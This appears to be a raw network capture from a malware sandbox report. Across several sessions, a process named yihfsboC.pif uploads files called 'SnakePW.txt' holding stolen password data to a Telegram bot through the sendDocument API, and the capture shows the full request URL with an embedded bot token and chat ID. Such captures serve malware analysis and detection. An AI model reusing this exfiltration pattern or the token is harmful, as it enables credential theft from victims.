                                                                                                                2024-11-26 07:25:49 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 30 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 34 38 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388903,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605948,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                34192.168.2.749858149.154.167.2204437924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:49 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0e7d2eac84a9
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:49 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 65 37 64 32 65 61 63 38 34 61 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0e7d2eac84a9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:25:50 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:50 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:50 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 30 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 35 30 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388906,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605950,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                35192.168.2.749864149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:50 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0ea18e3d18a2
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:50 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 65 61 31 38 65 33 64 31 38 61 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0ea18e3d18a2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:25:51 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:50 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:51 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 30 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 35 30 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388908,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605950,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                36192.168.2.749863149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:50 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f14dc5e3fef
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:50 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 31 34 64 63 35 65 33 66 65 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0f14dc5e3fefContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:25:51 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:50 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:51 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 30 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 35 30 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388909,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605950,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                37192.168.2.749867149.154.167.2204437924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:51 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0e97064f676e
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:51 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 65 39 37 30 36 34 66 36 37 36 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0e97064f676eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:25:52 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:52 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 523
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:52 UTC523INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 31 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 35 32 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388911,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605952,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                38192.168.2.749868149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:52 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0eb3179c3f7f
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:52 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 65 62 33 31 37 39 63 33 66 37 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0eb3179c3f7fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:25:53 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:52 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 523
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:53 UTC523INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 31 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 35 32 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388913,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605952,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                39192.168.2.749870149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:52 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f28be95a5fb
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:52 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 32 38 62 65 39 35 61 35 66 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0f28be95a5fbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:25:53 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:53 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 523
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:53 UTC523INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 31 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 35 32 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388915,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605952,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                40192.168.2.749876149.154.167.2204437924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:53 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0eab5a499b52
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:53 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 65 61 62 35 61 34 39 39 62 35 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0eab5a499b52Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:25:54 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:54 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
